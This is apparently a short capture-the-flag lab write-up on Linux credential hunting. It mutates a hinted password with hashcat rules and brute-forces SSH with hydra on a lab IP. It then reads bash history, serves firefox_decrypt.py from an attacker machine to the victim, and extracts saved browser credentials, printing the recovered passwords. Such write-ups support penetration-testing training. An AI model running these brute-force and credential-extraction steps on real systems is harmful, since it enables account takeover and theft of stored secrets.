Credential Hunting in Linux

June 07, 2024

First we have to mutate the password that was given to us from the room hint

Kira:LoveYou1

I just used the default custom rule from the room resources then i save it to mut_password.list

# First i input the LoveYou1 password into the password.list
subl password.list

# Then mutated it
hashcat --force password.list -r custom.rule --stdout > mut_password.list

wc mut_password.list

After that i just bruteforce it using username either Kira or kira that's why I did use wordlist for username

hydra -t 60 -L kira.txt -P mut_password.list 10.129.62.155 ssh

kira:L0vey0u1!

cat .bash_history

Just transfer the firefox_decrypt.py from the attacker machine to victim machine

python3 -m http.server

python3.9 firefox_decrypt.py

Will:TUqr7QfLTLhruhVbCP

PreviousCredential Hunting in Windows NextPasswd, Shadow & Opasswd

Last updated 1 year ago